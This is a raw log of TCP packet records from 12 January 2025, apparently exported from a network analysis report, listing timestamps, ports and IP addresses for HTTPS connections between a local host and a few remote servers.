                                                                                      Jan 12, 2025 17:24:10.276185036 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.276191950 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.276237011 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.276453018 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.276494026 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.276523113 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.276530027 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.276559114 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.276581049 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.348989964 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.349014997 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.349062920 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.349070072 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.349113941 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.349208117 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.349232912 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.349271059 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.349277973 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.349293947 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.349320889 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.350733995 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.350778103 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.350812912 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.350820065 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.350850105 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.350872993 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.364078999 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.364123106 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.364156008 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.364162922 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.364192963 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.364212990 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.364435911 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.364511967 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.365206003 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.365292072 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.366977930 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.367028952 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.367080927 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.367085934 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.367132902 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.367158890 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.367410898 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.367455006 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.367494106 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.367497921 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.367532969 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.367549896 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.367722988 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.367765903 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.367798090 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.367803097 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.370249033 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.370249033 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.441550970 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.441598892 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.441634893 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.441642046 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.441679001 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.441698074 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.441915035 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.441956043 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.441982031 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.441987038 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.442022085 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.442034960 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.443198919 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.443239927 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.443268061 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.443273067 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.443319082 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.443325043 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.456499100 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.456546068 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.456583023 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.456588984 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.456610918 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.456626892 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.456806898 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.456850052 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.456878901 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.456882954 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.456912041 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.456931114 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.459383011 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.459424019 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.459481955 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.459498882 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.459528923 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.459547043 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.459768057 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.459810972 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.459846020 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.459856987 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.459887981 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.459903955 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.460052013 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.460098028 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.460122108 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.460133076 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.460165024 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.460181952 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.534343004 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.534396887 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.534423113 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.534430027 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.534457922 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.534471035 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.534588099 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.534651041 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.534665108 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.534691095 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.534724951 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.534744024 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.535741091 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.535783052 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.535809994 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.535820961 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.535854101 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.535872936 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.548888922 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.548945904 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.548974991 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.548981905 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.549010992 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.549025059 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.549168110 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.549211979 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.549240112 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.549245119 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.549274921 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.549290895 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.551762104 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.551809072 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.551836014 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.551841021 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.551868916 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.551891088 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.552258015 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.552299023 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.552325010 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.552329063 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.552366018 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.552383900 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.552601099 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.552644014 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.552673101 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.552676916 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.552704096 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.552722931 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.626749039 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.626796007 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.627005100 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.627018929 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.627018929 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.627042055 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.627074957 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.627084017 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.627114058 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.627135038 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.627161980 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.627186060 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.628034115 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.628074884 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.628109932 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.628122091 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.628148079 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.628176928 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.641315937 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.641360998 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.641417027 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.641422987 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.641455889 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.641474962 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.641630888 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.641674042 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.641699076 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.641709089 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.641729116 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.641752958 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.644294977 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.644336939 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.644359112 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.644364119 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.644392967 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.644411087 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.644678116 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.644742012 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.644752026 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.644773960 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.644807100 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.644819975 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.644953966 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.644994974 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.645009041 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.645013094 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.645061016 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.719294071 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.719364882 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.719398022 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.719429970 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.719454050 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.719472885 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.719552994 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.719598055 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.719616890 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.719629049 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.719661951 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.719681978 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.720552921 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.720607996 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.720642090 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.720654011 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.720680952 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.720720053 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.733756065 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.733799934 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.733860016 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.733865023 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.733907938 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.734055042 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.734097958 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.734119892 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.734124899 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.734157085 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.734179020 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.736466885 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.736511946 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.736545086 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.736551046 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.736577988 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.736597061 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.736951113 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.736991882 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.737025023 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.737030029 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.737057924 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.737076044 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.737231016 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.737281084 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.737291098 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.737304926 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.737337112 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.737354994 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.811656952 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.811702013 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.811760902 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.811777115 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.811808109 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.811827898 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.811830044 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.811853886 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.811902046 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.811903000 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.811933994 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.811945915 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.811971903 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.812002897 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.812803984 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.812843084 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.812877893 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.812889099 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.812916994 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.812936068 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.825959921 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.826020956 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.826067924 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.826080084 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.826107025 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.826126099 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.826203108 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.826247931 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.826280117 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.826291084 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.826319933 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.826339006 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.828670025 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.828711987 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.828738928 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.828749895 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.828775883 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.828793049 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.829056978 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.829097986 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.829124928 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.829135895 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.829159975 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.829176903 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.829493046 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.829536915 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.829591990 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.829607964 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.829631090 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.829663992 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.903486013 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.903579950 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.903601885 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.903644085 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:10.903657913 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.903702974 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:10.906316996 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:25:23.142535925 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:23.142576933 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:23.142652988 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:23.143662930 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:23.143673897 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:23.601798058 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:23.601900101 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:23.607500076 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:23.607515097 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:23.607728958 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:23.656711102 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:23.656733990 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:23.656810999 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.074532032 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.074795961 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.074870110 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:24.077611923 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:24.077641964 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.077661037 CET49992443192.168.2.6188.114.97.3
                                                                                      Jan 12, 2025 17:25:24.077666998 CET44349992188.114.97.3192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.205856085 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:24.205954075 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.206454039 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:24.206775904 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:24.206815958 CET44349993104.102.49.254192.168.2.6
